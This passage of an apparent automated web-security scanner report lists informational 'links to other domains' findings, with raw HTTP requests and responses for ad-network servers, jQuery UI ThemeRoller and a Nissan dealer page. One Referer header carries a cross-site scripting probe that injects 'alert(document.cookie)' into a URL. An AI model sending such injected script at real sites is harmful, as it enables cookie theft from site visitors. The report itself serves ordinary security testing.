...[SNIP]...
<td><img src="https://im.morningstar.com/im/dot_clear.gif" width="175" height="5"/></td>
...[SNIP]...

17.194. http://ib.adnxs.com/ab

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /ab?enc=K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBAgUCAAIAAAAAox0IPAAAAAA.&tt_code=nydailynews.com&udj=uf%28%27a%27%2C+537%2C+1296224069%29%3Buf%28%27c%27%2C+5740%2C+1296224069%29%3Buf%28%27r%27%2C+157830%2C+1296224069%29%3Bppv%28783%2C+%273218538236873087490%27%2C+1296224069%2C+1297520069%2C+5740%2C+25733%29%3B&cnd=!txXYTwjsLBCG0QkYACCFyQEougcxnEjEH7d3DUBCEwgAEAAYACABKP7__________wFIAFAAWPYZYABotQI.&referrer=http://www.nydailynews.com/blogs70f75 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; uuid2=4760492999213801733; anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ=FzXN9?TZi)>y1-^s2mzPD+@4+<i:[v#mk@cE3+b8?jraDJt@%+`'uLM/Dl+8<5/!Ww5LUeE=7?vbgm<6zEk@/WBJ[MOl!9-@aXV4)=rJOM@R5(?)a%ZJ2Wcbf*>2GHpO^8q6y4.W-*y?$3o38q>cC^S[A.LeTUm`>tMe:Vn15)3V9!][_fmn.CQInWmsln_lnhV2sS:M5*3DU7fN@fu#Pa!9L%Hn?en]; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 14:14:29 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:14:29 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:14:29 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; path=/; expires=Thu, 28-Apr-2011 14:14:29 GMT; domain=.adnxs.com; HttpOnly
Date: Fri, 28 Jan 2011 14:14:29 GMT
Content-Length: 802

document.write('<a href="http://ib.adnxs.com/click/K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBA
...[SNIP]...
</a><img src="http://aidps.atdmt.com/AI/Api/v1/UserRest.svc/Provider/1AC1C520-232B-4E3D-B0CC-A52AC15EB7D4/User/4760492999213801733/gif?meta=appNexus" width="1" height="1"/>');

17.195. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-48597195_1296251864%2C11d765b6a10b1b3%2CMiscellaneous%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D199062%3Bcontx%3DMiscellaneous%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.3579352851957083%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG3H<fQCe7?0P(*AuB-u**g1:XIC(WUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy6A3fm`:Idk3X!(*W2F2Hk''SykpRE%:434AnQ9O>WxYDWB13NOp+/5AIyhgU6ROEcF@:XJvR6qJ:uuL`8Q2Vw2t![$ph'S1S['D+Ir$>37Xp$KdW'FoQ)MSzM(Q66u2x%X_(L:Sjx('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o>Pj9!*^

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 21:57:44 GMT
Content-Length: 664

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-48597195_1296251864,11d765b6a10b1b3,Miscellaneous,cm.cm_aa_gn1-cm.sportsreg-cm.spo
...[SNIP]...
</scr'+'ipt>');document.write('<img src="http://r.openx.net/set?pid=408c9df8-85fe-6893-4938-ccbfd204601e&rtb=4760492999213801733" width="1" height="1"/>');

17.196. http://jqueryui.com/themeroller/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 04:51:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 119917

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="icon" href="/images/favicon.ico" type="image/x-icon" />
           <link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <link rel="stylesheet" href="http://static.jquery.com/ui/themeroller/app_css/app_screen.css" type="text/css" media="all" />
           <link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/themes/base/jquery-ui.css" type="text/css" media="all" />
           <link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureH
...[SNIP]...
Shadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
           <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js" type="text/javascript"></script>
           <script src="http://static.jquery.com/ui/themeroller/scripts/app.js" type="text/javascript"></script>
...[SNIP]...
<li>
                   <a href="http://jquery.com">jQuery</a>
...[SNIP]...
<li style="padding-right: 12px;">
                   <a href="http://plugins.jquery.com/">Plugins</a>
...[SNIP]...
<li>
                   <a href="http://docs.jquery.com/Donate">Donate</a>
...[SNIP]...
</span>
               <a class="block filamentgroup" href="http://www.filamentgroup.com"><span>
...[SNIP]...
<span class="first" style="float: right; padding-right: 12px;">&copy; 2010 The <a href="http://jquery.org/">jQuery Project</a>
...[SNIP]...

17.197. http://local.nissanusa.com/zip.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /zip.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /zip.aspx?regionalZipCode=null&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Fri, 28 Jan 2011 16:59:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:59:38 GMT
Content-Length: 15973
Connection: close
Set-Cookie: PHPSESSID=p7dlskl4o4uogqp5vvt34gapi6; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=1361549;type=landi756;cat=zipco403;ord=1;num=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<li><a id="trade_in_value" target="_blank" href="http://web1.intellipriceauto.com/ETRADEINMATRIX/IDENTIFY.ASPX?LCDEALER=970001&SPANISH=NO&DEALERID=970001&tool=regional.trade_in"><img alt="Get Trade In Value" src="http://local.nissanusa.com/images/zpa/trade_en.jpg"/>
...[SNIP]...

17.198. http://network.realmedia.com/3/bostonherald/ros/728x90/jx/ss/a/L31@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /3/bostonherald/ros/728x90/jx/ss/a/L31@Top1

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/bostonherald/ros/728x90/jx/ss/a/L31@Top1?CAMP=USNetwork/BCN2010090393_015a_HRBlock HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:05:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1021
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:06:24 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31/L12&mm_flag="></script>
...[SNIP]...

17.199. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670?http://clk.redcated/MDS/go/289553367/direct/01/219928446 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:04:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://clk.redcated/MDS/go/289553367/direct/01/219928446
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:05:27 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://clk.atdmt.com/MDS/go/289553367/direct/01/219928446">here</a>
...[SNIP]...

17.200. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670?http://clk.redcated/go/289553367/direct;ai.198788117;ct.1/01 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:04:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://clk.redcated/go/289553367/direct;ai.198788117;ct.1/01
Content-Length: 333
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:05:33 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://clk.atdmt.com/go/289553367/direct;ai.198788117;ct.1/01">here</a>
...[SNIP]...

17.201. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670?http://clk.redcated/MDS/go/289553367/direct/01/857611358 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:03:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://clk.redcated/MDS/go/289553367/direct/01/857611358
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:35 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://clk.atdmt.com/MDS/go/289553367/direct/01/857611358">here</a>
...[SNIP]...

17.202. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670?http://clk.redcated/go/289553367/direct;ai.198788117;ct.1/01 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
